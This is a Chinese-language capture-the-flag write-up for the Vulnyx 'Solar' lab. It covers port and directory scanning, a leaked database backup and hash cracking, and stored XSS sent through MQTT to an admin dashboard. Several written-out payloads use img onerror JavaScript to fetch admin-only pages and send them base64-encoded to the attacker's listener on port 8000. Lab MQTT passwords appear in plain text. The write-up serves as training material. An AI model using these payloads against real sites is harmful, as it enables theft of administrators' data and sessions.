Solar - Vulnyx

挑战一下solar

图片.png

设置ip变量，扫描开放端口

Kal ddddx ~ ❯export ip=192.168.81.83 
Kal ddddx ~ ❯ rustscan -a $ip --ulimit 5000 -- -A -oN scan_result.txt                              took 25s at 14:35:36
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/home/ddddx/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 192.168.81.83:22
Open 192.168.81.83:80
Open 192.168.81.83:443
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A -oN scan_result.txt" on ip 192.168.81.83
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 14:38 CST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:38
Completed NSE at 14:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:38
Completed NSE at 14:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:38
Completed NSE at 14:38, 0.00s elapsed
Initiating ARP Ping Scan at 14:38
Scanning 192.168.81.83 [1 port]
Completed ARP Ping Scan at 14:38, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:38
Completed Parallel DNS resolution of 1 host. at 14:39, 13.00s elapsed
DNS resolution of 1 IPs took 13.00s. Mode: Async [#: 1, OK: 0, NX: 0, DR: 1, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 14:39
Scanning 192.168.81.83 [3 ports]
Completed SYN Stealth Scan at 14:39, 1.24s elapsed (3 total ports)
Initiating Service scan at 14:39
Initiating OS detection (try #1) against 192.168.81.83
Retrying OS detection (try #2) against 192.168.81.83
NSE: Script scanning 192.168.81.83.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:39
Completed NSE at 14:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:39
Completed NSE at 14:39, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:39
Completed NSE at 14:39, 0.00s elapsed
Nmap scan report for 192.168.81.83
Host is up, received arp-response (0.00095s latency).
Scanned at 2025-03-20 14:39:05 CST for 3s

PORT    STATE    SERVICE REASON      VERSION
22/tcp  filtered ssh     no-response
80/tcp  filtered http    no-response
443/tcp filtered https   no-response
MAC Address: 08:00:27:EA:09:D9 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=3/20%OT=%CT=%CU=36142%PV=Y%DS=1%DC=D%G=N%M=080027%TM=67DBB80C%P=x86_64-pc-linux-gnu)
SEQ(II=I)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.95 ms 192.168.81.83

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:39
Completed NSE at 14:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:39
Completed NSE at 14:39, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:39
Completed NSE at 14:39, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.91 seconds
           Raw packets sent: 37 (3.040KB) | Rcvd: 7 (1.392KB)

实验室配置问题nmap扫描显示 filtered实际为open，扫描发现配置域名

www.solar.nyx 和 www.sunfriends.nyx将他们配置到hosts中,这里为了方便windows也配置了

1 2	Kal ddddx ~ ❯ echo "$ip www.solar.nyx www.sunfriends.nyx"\|sudo tee -a /etc/hosts at 14:43:18 192.168.81.83 www.solar.nyx www.sunfriends.nyx

图片.png

浏览器显示有风险，进去80端口发现重定向到www.solar.nyx，并且在443端口有本地签名

访问第一个域名发现一个登录框，尝试弱密码和万能密码登录，无效

图片.png

另一个域名为维护界面

图片.png

对第一域名进行目录扫描

Kal ddddx ~ ❯ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \     at 15:03:53
-u https://www.solar.nyx -x php -k --no-error
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://www.solar.nyx
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 745]
/.php                 (Status: 403) [Size: 279]
/login.php            (Status: 200) [Size: 0]
/logout.php           (Status: 302) [Size: 0] [--> index.php?msg=Log-out.]
/dashboard.php        (Status: 302) [Size: 0] [--> index.php]
/records              (Status: 301) [Size: 318] [--> https://www.solar.nyx/records/]
/session.php          (Status: 200) [Size: 0]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 441118 / 441120 (100.00%)
===============================================================
Finished
===============================================================

**域名二
Kal ddddx ~ ❯ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u https://www.sunfriends.nyx -x php -k --no-error
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://www.sunfriends.nyx
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 11089]
/.php                 (Status: 403) [Size: 284]
/commands             (Status: 301) [Size: 329] [--> https://www.sunfriends.nyx/commands/]
/.php                 (Status: 403) [Size: 284]
/server-status        (Status: 403) [Size: 284]
Progress: 441118 / 441120 (100.00%)
===============================================================
Finished
===============================================================**

尝试扫描出的目录，发现没有额外东西，只有域名二中的server.php中有个登录服务,尝试弱密码和万能密码发现无效

图片.png

看教程说是藏了个隐藏sql文件后缀为gz，不常见所以扫描时候没加

Kal ddddx ~ ❯ gobuster dir -u https://www.sunfriends.nyx -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt,sql,jpg,db,tar,sql.gz,gzip,gz2,gz,sql -b 403,404 -k --no-error
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://www.sunfriends.nyx
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              gzip,gz2,gz,zip,txt,db,tar,php,html,sql,jpg,sql.gz
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 11089]
/server.php           (Status: 200) [Size: 1523]
/database.sql.gz      (Status: 200) [Size: 1010]

获取文件，放到了solar文件夹中，由于网站是自验证所以需要添加-k参数忽视验证

Kal ddddx ~ ❯ curl -k https://www.sunfriends.nyx/database.sql.gz -o solar/database.sql.gz                   at 15:36:04
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1010  100  1010    0     0    98k      0 --:--:-- --:--:-- --:--:--   98k
Kal ddddx ~ ❯ ls solar                                                                                      at 15:36:10
database.sql.gz
Kal ddddx ~ ❯ gzip -d solar/database.sql.gz

解压发现是一个数据库的备份，浏览发现包含用户的账户密码，其中JulianAdm为管理员，开始破解hash函数

图片.png

看位数猜测为sha256格式加密，发现只有calvin的密码可以破解，密码为emily

图片.png

尝试登录

图片.png

毫无头绪，查看页面源码让ai解读发现存在MQTT数据通信

账户为：user
密码为：1tEa15klQpTx9Oub6ENG

图片.png

并且存在数据同步，从data中

图片.png

开始下载MQTTX ，这里可以使用其他MQTT连接设备，MQTTX有gui界面并且可以在windows中使用，很方便：）

图片.png

用上面得到的凭证连接，订阅#发现一直有数据在发

图片.png

构造数据发送到data主题，发现有显示，观察页面为javascript构建，尝试构造JavaScript代码上传将

1 2	Kal ddddx ~ ❯ echo "alert('XSS')" \| base64 at 15:37:32 YWxlcnQoJ1hTUycpCg==

{  
"solarEnergy": "<img src=x onerror=eval(atob(\/[base64encodeJavascriptCode]\/.source)); />",  
"consumedEnergy": 15
}

<img src=x ...>
- 这里创建了一个 HTML <img> 标签。
- src=x 指定了一个无效的图片路径（x 不是有效的 URL）。
- 由于 src 不能正确加载，浏览器会触发 onerror 事件。
onerror=eval(atob(\/[base64encodeJavascriptCode]\/.source));
- onerror 事件在图片加载失败时执行 JavaScript 代码。
- eval(...)：执行传入的 JavaScript 代码（高危函数，可能导致 XSS）。
- atob(...)：将 Base64 编码的字符串解码为普通文本。
- /[base64encodeJavascriptCode]/.source：
  - 这里的 [base64encodeJavascriptCode] 代表一个 Base64 编码后的 JavaScript 代码字符串。
  - .source 是正则表达式对象的 source 属性，目的是让 /.../ 作为字符串而非正则表达式来解析（避免直接写字符串时的语法问题）。

图片.png

查看维护信息界面，管理员说会查看仪表盘所以可以借此获取当前页面源码

首先用python在kali中开一个端口8000用来接收

pyload，进行捕获

{  
"solarEnergy": "<img src=x onerror=\"(async () => {location.href='http://192.168.81.60:8000?url='+encodeURIComponent(window.location.href)+'&code='+btoa(document.body.outerHTML);})();\"; />",  
"consumedEnergy": 15
}

获得两段信息，一段为自己主机的，一段为base64加密后的页面源码进行base64解码后得到页面源码

<body>
    <div class="dashboard">
        <object class="solar-icon" data="sun.svg" type="image/svg+xml" style="width:75px;"></object>
        <h1>Solar Energy Dashboard</h1>
        <div class="user-info" id="userInfo"><span>JulianAdm</span><br>admin</div>
        <canvas id="energyChart" class="energy-chart" width="400" height="200" style="display: block; box-sizing: border-box; height: 200px; width: 400px;"></canvas>
        <div class="energy-label"><span class="solar-title">Solar:</span> <span id="solarEnergyLabel" class="energy-value solar"><span class="energy-value solar"><img src="x" onerror="(async () => {location.href='http://192.168.81.60:8000?url='+encodeURIComponent(window.location.href)+'&amp;code='+btoa(document.body.outerHTML);})();" ;=""> kWh</span></span></div>
        <div class="energy-label"><span class="consumed-title">Consumed:</span> <span id="consumedEnergyLabel" class="energy-value consumed"><span class="energy-value consumed">15 kWh</span></span></div>
        <div class="energy-label"><span class="grid-title">Grid:</span> <span id="gridEnergyLabel" class="energy-value grid-positive"><span class="energy-value grid-positive">NaN kWh</span></span></div>
        <a href="/logout.php" class="logout-link" id="logoutLink">Logout</a>
                    <a href="/records/" class="logout-link">Records</a>
            <a href="#" class="logout-link" id="send-record-id">Send record</a>
            </div>

    <!--<script src="/mqtt.min.js"></script>-->
    
    <script src="/chart.js"></script>
    <script type="module">
        import mqtt from '/mqtt.js'
        
        let userName = "JulianAdm";
        let userRole = "admin";

        var mqttclient = mqtt.connect('wss://www.solar.nyx/wss/', {
            clientId: userName + '-dashboard-' + new Date().valueOf(),
            username: 'admin',
            password: 'tJH8HvwVwC57BR6CEyg5',
            protocolId: 'MQTT'
        });

        mqttclient.on("message", getMessagesStatus);

        function getMessagesStatus(msTopic, msBody) {
            let data = JSON.parse(msBody.toString());
            setParams(data.solarEnergy, data.consumedEnergy);
        }

        mqttclient.subscribe("data", function (err) {
            if (err) {
                console.log('ERROR MQTT', err.toString());
                mqttclient.end();
            }
        });

        let solar = 0, consumed = 0, grid = 0;

        // Initialize the bar chart using Chart.js
        const ctx = document.getElementById('energyChart').getContext('2d');
        let energyChart = new Chart(ctx, {
            type: 'bar',
            data: {
                labels: ['Solar', 'Consumed', 'Grid'],
                datasets: [{
                    label: 'Energy (kWh)',
                    data: [solar, consumed, grid],
                    backgroundColor: ['#6fcf97', '#eb5757', '#56ccf2'],
                }]
            },
            options: {
                scales: {
                    y: {
                        beginAtZero: true,
                        ticks: {
                            callback: function (value) { return value + " kWh"; }
                        }
                    }
                },
                plugins: {
                    legend: {
                        display: false
                    },
                    tooltip: {
                        callbacks: {
                            label: function (context) {
                                return context.dataset.label + ': ' + context.raw + ' kWh';
                            }
                        }
                    }
                }
            }
        });

        // Update the chart and labels with new data
        function setParams(solarEnergy, consumedEnergy) {
            let gridEnergy = consumedEnergy - solarEnergy;
            solar = solarEnergy;
            consumed = consumedEnergy;
            grid = gridEnergy;
            

            // Update the bar chart
            energyChart.data.datasets[0].data = [solar, consumed, grid];
            energyChart.update();

            // Update labels with specific colors
            document.getElementById('solarEnergyLabel').innerHTML = `<span class="energy-value solar">${solarEnergy} kWh</span>`;
            document.getElementById('consumedEnergyLabel').innerHTML = `<span class="energy-value consumed">${consumedEnergy} kWh</span>`;

            let gridLabel = document.getElementById('gridEnergyLabel');
            gridLabel.innerHTML = `<span class="energy-value ${gridEnergy < 0 ? 'grid-negative' : 'grid-positive'}">${gridEnergy} kWh</span>`;

            document.getElementById('userInfo').innerHTML = `<span>${userName}</span><br>${userRole}`;
        }

        setParams(0, 0);

            // Show message
            function showMessage(msg) {
                const mensajeDiv = document.createElement('div');
                mensajeDiv.classList.add("temp-message")
                mensajeDiv.textContent = msg;
                document.body.appendChild(mensajeDiv);
                setTimeout(() => {
                    mensajeDiv.remove();
                }, 3000);
            }

            // Function to send the record 
            function sendrecord() {
                let btn = document.getElementById('send-record-id');
                if (!btn.disabled) {
                    // Capture the chart as a base64 image
                    let chartImage = energyChart.toBase64Image();

                    mqttclient.publish('record', JSON.stringify({
                        time: new Date().toISOString(),
                        user: {
                            name: userName,
                            role: userRole
                        },
                        solar: solar,
                        consumed: consumed,
                        grid: grid,
                        chart: chartImage
                    }));

                    btn.disabled = true;
                    btn.style.opacity = '0.3';

                    setTimeout(() => {
                        btn.style.opacity = '1';
                        btn.disabled = false;
                        showMessage('Record was end successfully!')
                    }, 1500);
                }
            }
            document.getElementById('send-record-id').onclick = sendrecord;
    
    </script>

</body>

我们攻击的代码在第三个div ：）

图片.png

对比正常的仪表盘界面我们发现最后登录为admin用户，且此连接MQTT的是admin用户

图片.png

代码里有写捕获单击事件发布到record

构造单击事件payload复现情形，可在record发现返回，成功获取admin人员数据

{  
"solarEnergy": "<img src=x onerror=\"document.querySelector(`#send-record-id`).dispatchEvent(new Event('click'));\" />", 
 "consumedEnergy": 15
 }

图片.png

没有思路，发现作者是用伪造chart，按他的思路，我们也将另一个 XSS 插入到 JSON 的 chart 参数中，假设它将嵌入到 HTML <img> 标签的 src 属性中尝试，伪造chart，发现发送到record里他也会显示说明成功

{
"time":"2025-02-20T10:57:01.468Z",
"user":{
	"name":"JulianAdm",
	"role":"admin"},
"solar": 211,
"consumed": 168,
"grid": -43,
"chart": "\"><h1>This is h1 title</h1></"
}

图片.png

尝试进入records页面发现需要登录并且之前获得的那个用户并没有权限登录，回去尝试获取records页面源码，同之前一样尝试开启http服务，构建js获取源码，发现成果，base64解码
这段 HTML 代码展示了一个 太阳能数据列表，其中列出了多个数据记录，并为每个记录提供了一个 “Download PDF” 按钮，用于下载相应的数据文件。

看ai跑出来说是可能包含文件包含漏洞

{
"solarEnergy": "<img src=x onerror=\"(async () => { location.href='[http://192.168.81.60:8000/?data='+btoa](http://192.168.81.60:8000/?data=%27+btoa)(String.fromCharCode(...new Uint8Array(await (await fetch('/records/')).arrayBuffer())));})(); \" />",
"consumedEnergy": 15
}

192.168.81.83 - - [20/Mar/2025 18:03:18] "GET /?data=PCFET0NUWVBFIGh0bWw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+TGlzdCBvZiBTb2xhciBFbmVyZ3kgRGF0YTwvdGl0bGU+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Ii9zdHlsZS5jc3MiPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSIvc3R5bGUzLmNzcyI+CjwvaGVhZD4KCjxib2R5PgogICAgPGRpdiBzdHlsZT0ibWluLXdpZHRoOjQwMHB4O2JhY2tncm91bmQ6d2hpdGU7cGFkZGluZzoxNXB4O2JvcmRlci1yYWRpdXM6IDhweDtib3gtc2hhZG93OiAwIDAgMTBweCByZ2JhKDAsIDAsIDAsIDAuMSk7Ij4KICAgICAgICA8ZGl2IHN0eWxlPSJ0ZXh0LWFsaWduOmNlbnRlcjsiPjxvYmplY3QgY2xhc3M9InNvbGFyLWljb24iIGRhdGE9Ii4uL3N1bi5zdmciIHR5cGU9ImltYWdlL3N2Zyt4bWwiIHN0eWxlPSJ3aWR0aDo3NXB4OyI+PC9vYmplY3Q+PC9kaXY+CiAgICAgICAgPGgxPkxpc3Qgb2YgU29sYXIgRW5lcmd5IERhdGE8L2gxPgogICAgICAgIDx0YWJsZT4KICAgICAgICAgICAgPHRyPgogICAgICAgICAgICAgICAgPHRoPlJlY29yZDwvdGg+CiAgICAgICAgICAgICAgICA8dGg+QWN0aW9uczwvdGg+CiAgICAgICAgICAgIDwvdHI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+CiAgICAgICAgICAgICAgICAgICAgPHRkPjIwMjQtMDktMDJUMjM6MTU6MTEuMzk2WjwvdGQ+CiAgICAgICAgICAgICAgICAgICAgPHRkPgogICAgICAgICAgICAgICAgICAgICAgICA8YSBocmVmPSI/ZG93bmxvYWQ9dHJ1ZSZmaWxlPTIwMjQtMDktMDJUMjMlM0ExNSUzQTExLjM5NlouanNvbiIgY2xhc3M9ImRvd25sb2FkLWJ0biI+RG93bmxvYWQgUERGPC9hPgogICAgICAgICAgICAgICAgICAgIDwvdGQ+CiAgICAgICAgICAgICAgICA8L3RyPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHRyPgogICAgICAgICAgICAgICAgICAgIDx0ZD4yMDI0LTA5LTAyVDIzOjE4OjE1Ljc0Mlo8L3RkPgogICAgICAgICAgICAgICAgICAgIDx0ZD4KICAgICAgICAgICAgICAgICAgICAgICAgPGEgaHJlZj0iP2Rvd25sb2FkPXRydWUmZmlsZT0yMDI0LTA5LTAyVDIzJTNBMTglM0ExNS43NDJaLmpzb24iIGNsYXNzPSJkb3dubG9hZC1idG4iPkRvd25sb2FkIFBERjwvYT4KICAgICAgICAgICAgICAgICAgICA8L3RkPgogICAgICAgICAgICAgICAgPC90cj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0cj4KICAgICAgICAgICAgICAgICAgICA8dGQ+MjAyNC0wOS0wMlQyMzoxODo0NC4wOTFaPC90ZD4KICAgICAgICAgICAgICAgICAgICA8dGQ+CiAgICAgICAgICAgICAgICAgICAgICAgIDxhIGhyZWY9Ij9kb3dubG9hZD10cnVlJmZpbGU9MjAyNC0wOS0wMlQyMyUzQTE4JTNBNDQuMDkxWi5qc29uIiBjbGFzcz0iZG93bmxvYWQtYnRuIj5Eb3dubG9hZCBQREY8L2E+CiAgICAgICAgICAgICAgICAgICAgPC90ZD4KICAgICAgICAgICAgICAgIDwvdHI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+CiAgICAgICAgICAgICAgICAgICAgPHRkPjIwMjQtMDktMDJUMjM6MjQ6MzMuODI4WjwvdGQ+CiAgICAgICAgICAgICAgICAgICAgPHRkPgogICAgICAgICAgICAgICAgICAgICAgICA8YSBocmVmPSI/ZG93bmxvYWQ9dHJ1ZSZmaWxlPTIwMjQtMDktMDJUMjMlM0EyNCUzQTMzLjgyOFouanNvbiIgY2xhc3M9ImRvd25sb2FkLWJ0biI+RG93bmxvYWQgUERGPC9hPgogICAgICAgICAgICAgICAgICAgIDwvdGQ+CiAgICAgICAgICAgICAgICA8L3RyPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHRyPgogICAgICAgICAgICAgICAgICAgIDx0ZD4yMDI0LTA5LTAyVDIzOjI0OjQ0LjgwMFo8L3RkPgogICAgICAgICAgICAgICAgICAgIDx0ZD4KICAgICAgICAgICAgICAgICAgICAgICAgPGEgaHJlZj0iP2Rvd25sb2FkPXRydWUmZmlsZT0yMDI0LTA5LTAyVDIzJTNBMjQlM0E0NC44MDBaLmpzb24iIGNsYXNzPSJkb3dubG9hZC1idG4iPkRvd25sb2FkIFBERjwvYT4KICAgICAgICAgICAgICAgICAgICA8L3RkPgogICAgICAgICAgICAgICAgPC90cj4KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0cj4KICAgICAgICAgICAgICAgICAgICA8dGQ+MjAyNC0wOS0wMlQyMzoyNToxNS45NjFaPC90ZD4KICAgICAgICAgICAgICAgICAgICA8dGQ+CiAgICAgICAgICAgICAgICAgICAgICAgIDxhIGhyZWY9Ij9kb3dubG9hZD10cnVlJmZpbGU9MjAyNC0wOS0wMlQyMyUzQTI1JTNBMTUuOTYxWi5qc29uIiBjbGFzcz0iZG93bmxvYWQtYnRuIj5Eb3dubG9hZCBQREY8L2E+CiAgICAgICAgICAgICAgICAgICAgPC90ZD4KICAgICAgICAgICAgICAgIDwvdHI+CiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+CiAgICAgICAgICAgICAgICAgICAgPHRkPjIwMjQtMDktMDJUMjM6Mjk6MTQuMTI0WjwvdGQ+CiAgICAgICAgICAgICAgICAgICAgPHRkPgogICAgICAgICAgICAgICAgICAgICAgICA8YSBocmVmPSI/ZG93bmxvYWQ9dHJ1ZSZmaWxlPTIwMjQtMDktMDJUMjMlM0EyOSUzQTE0LjEyNFouanNvbiIgY2xhc3M9ImRvd25sb2FkLWJ0biI+RG93bmxvYWQgUERGPC9hPgogICAgICAgICAgICAgICAgICAgIDwvdGQ+CiAgICAgICAgICAgICAgICA8L3RyPgogICAgICAgICAgICAgICAgICAgIDwvdGFibGU+CiAgICAgICAgPGEgaHJlZj0iLi4vZGFzaGJvYXJkLnBocCIgY2xhc3M9ImxvZ291dC1saW5rIj4mbHQ7IEJhY2s8L2E+CiAgICA8L2Rpdj4KPC9ib2R5PgoKPC9odG1sPg== HTTP/1.1" 200 -

<!DOCTYPE html>
<html>

<head>
    <title>List of Solar Energy Data</title>
    <link rel="stylesheet" href="/style.css">
    <link rel="stylesheet" href="/style3.css">
</head>

<body>
    <div style="min-width:400px;background:white;padding:15px;border-radius: 8px;box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);">
        <div style="text-align:center;"><object class="solar-icon" data="../sun.svg" type="image/svg+xml" style="width:75px;"></object></div>
        <h1>List of Solar Energy Data</h1>
        <table>
            <tr>
                <th>Record</th>
                <th>Actions</th>
            </tr>
                            <tr>
                    <td>2024-09-02T23:15:11.396Z</td>
                    <td>
                        <a href="?download=true&file=2024-09-02T23%3A15%3A11.396Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2024-09-02T23:18:15.742Z</td>
                    <td>
                        <a href="?download=true&file=2024-09-02T23%3A18%3A15.742Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2024-09-02T23:18:44.091Z</td>
                    <td>
                        <a href="?download=true&file=2024-09-02T23%3A18%3A44.091Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2024-09-02T23:24:33.828Z</td>
                    <td>
                        <a href="?download=true&file=2024-09-02T23%3A24%3A33.828Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2024-09-02T23:24:44.800Z</td>
                    <td>
                        <a href="?download=true&file=2024-09-02T23%3A24%3A44.800Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2024-09-02T23:25:15.961Z</td>
                    <td>
                        <a href="?download=true&file=2024-09-02T23%3A25%3A15.961Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                            <tr>
                    <td>2024-09-02T23:29:14.124Z</td>
                    <td>
                        <a href="?download=true&file=2024-09-02T23%3A29%3A14.124Z.json" class="download-btn">Download PDF</a>
                    </td>
                </tr>
                    </table>
        <a href="../dashboard.php" class="logout-link">&lt; Back</a>
    </div>
</body>

</html>

图片.png

使用相同的技术编辑，尝试获取pdf,编辑payload，

{
  "solarEnergy": "<img src=x onerror=\"(async () => {location.href='http://192.168.81.60:8000?data='+btoa(String.fromCharCode(...new Uint8Array(await (await fetch('/records/?download=true&file=2024-09-02T23%3A29%3A14.124Z.json')).arrayBuffer())));})();\" />",
  "consumedEnergy": 15
}

payload拆解，文件包含

<img src=x onerror="(async () => { 
    location.href='http://192.168.81.60:8000?data=' + 
    btoa(String.fromCharCode(...new Uint8Array(await (await fetch('/records/?download=true&file=2024-09-02T23%3A29%3A26.645Z.json')).arrayBuffer()))); 
})();" />

浏览器解析 <img> 标签时，发现 src="x" 无效，触发 onerror 事件。
JavaScript 代码执行，向服务器 /records/ 发送 fetch 请求，下载 2024-09-02T23:29:26.645Z.json 文件。
服务器返回 JSON 文件（如果受害者已登录，并且服务器未进行身份验证）。
JavaScript 读取文件内容，将其转换为 Base64 编码。
使用 location.href 发送数据到攻击者服务器 192.168.1.116。
攻击者解码数据，成功窃取 JSON 文件内容。

base64解码并转换为pdf格式，查看文件属性发现创作者为wkhtmltopdf 0.12.6.1

wkhtmltopdf是一个开源的命令行工具，用于将HTML文件转换成PDF文件。它是基于WebKit的HTML转PDF工具，支持各种操作系统，包括Windows、Mac和Linux。版本0.12.6.1是该工具的一个特定版本，包含了一些特定的功能和修复了一些bug。用户可以使用wkhtmltopdf来快速高效地将HTML页面转换为PDF文件。

图片.png

1
2


192.168.81.83 - - [21/Mar/2025 10:22:13] "GET /?data=JVBERi0xLjQKMSAwIG9iago8PAovVGl0bGUgKP7/AFMAbwBsAGEAcgAgAEUAbgBlAHIAZwB5ACAARABhAHQAYSkKL0NyZWF0b3IgKP7/AHcAawBoAHQAbQBsAHQAbwBwAGQAZgAgADAALgAxADIALgA2AC4AMSkKL1Byb2R1Y2VyICj+/wBRAHQAIAA0AC4AOAAuADcpCi9DcmVhdGlvbkRhdGUgKEQ6MjAyNTAzMjExMDIyMTAtMDQnMDAnKQo+PgplbmRvYmoKMyAwIG9iago8PAovVHlwZSAvRXh0R1N0YXRlCi9TQSB0cnVlCi9TTSAwLjAyCi9jYSAxLjAKL0NBIDEuMAovQUlTIGZhbHNlCi9TTWFzayAvTm9uZT4+CmVuZG9iago0IDAgb2JqClsvUGF0dGVybiAvRGV2aWNlUkdCXQplbmRvYmoKNyAwIG9iago8PAovVHlwZSAvWE9iamVjdAovU3VidHlwZSAvSW1hZ2UKL1dpZHRoIDQwMAovSGVpZ2h0IDIwMAovQml0c1BlckNvbXBvbmVudCA4Ci9Db2xvclNwYWNlIC9EZXZpY2VHcmF5Ci9MZW5ndGggOCAwIFIKL0ZpbHRlciAvRmxhdGVEZWNvZGUKPj4Kc3RyZWFtCnic7Zx9bFNVGMbfbd0HblDYQGGCLBgZWnQqYaDDiILiB2EQ0aiRjEiMaMxE8COT6PA7oImKEVFECUaBoOJHVAQFddMRGAOdoEhwg6FzTplj4MAp9Zz1dG43Dr3tOT1v2+f3R3vbZee59/52e5f0yUsEAAAAhM7l25vLhxN96vf73yXK39q4tId8u3CNfFy2hKhX2y1Eo/8YUW13P+OEgYcuzViwg6huSHp6GiXtm9LjrXvl+wEf08VPJh0Wm7PKffARCa79kMh7rHdaS/ur8V8RFeySW8KHb/+onGO9aeGjv3lo5SO+HY/VVlxsdV/jgfRMorF7aFhTZdP6ITRjJVGfI/L9wjUDa64kqp1AO33bC6j2Up//toR55bZ3Nx6YVF9I+e+dmvz0Zrpb3C88/p7izcJPvn5ZPC174OR6WvDAgLYM3x8ZdBY+s4zjXfFNQWDrFH/mTSvE9dGWIF4U+p9oHiBuIOuKXqHxFVM2kU/cSnAPMU7ypmeTxdPoMUQD/kwfV0V03nfy/cK19NJSopzm16ZTWsuS+e0uAj6yAwzPjiwRzov04SkfUytTBTS5YVji/A8oaf9FSSvvb/exhrIP5okbyNFBRGuPXtHJh6JjiQgR23FBHvNLvFS8u+H1k4hGVO1dmiLfl//vlq4XNxD539bsP3vBB3fggxfwwQv44AV88AI+eAEfvIAPXsAHL+CDF/DBC/jgBXzwAj544fRRuFEvTzrzInZkNuI6UH0fVfRx0fdx+rjVr5cNzjxTZ+DfseRD9X1U0cdN3wc+TKD6Pqro46bvAx8mUH0fVfRx0/eBD0PIvo8q+rjp+8CHEQJ9H1X0cdP3gQ8TqL6PKvq46fuc4yislGj2Ue5Y35lnmAjHOfo+qugTTt8H14cOgn0fVfQJo+8DH3aBD17ABy/ggxfwwQv44AV88AI+eAEfvIAPXsAHL+CDF/DBC/jgBXwYolhGu5/vAx9G8IxryaVQ5vtY9uHVXL/b6D1uXMRYXt0mfIQw38eyj76a4/x9jxsXQeqFjxDm+8CHIaSPEOb7wIchpA+Jy/k+8GEI6SOE+T6W+z4+zXF+33HjjNPVh4b5Prg+NNH+eRX+fB/4sAt88AI+eAEfvIAPXsAHL+CDF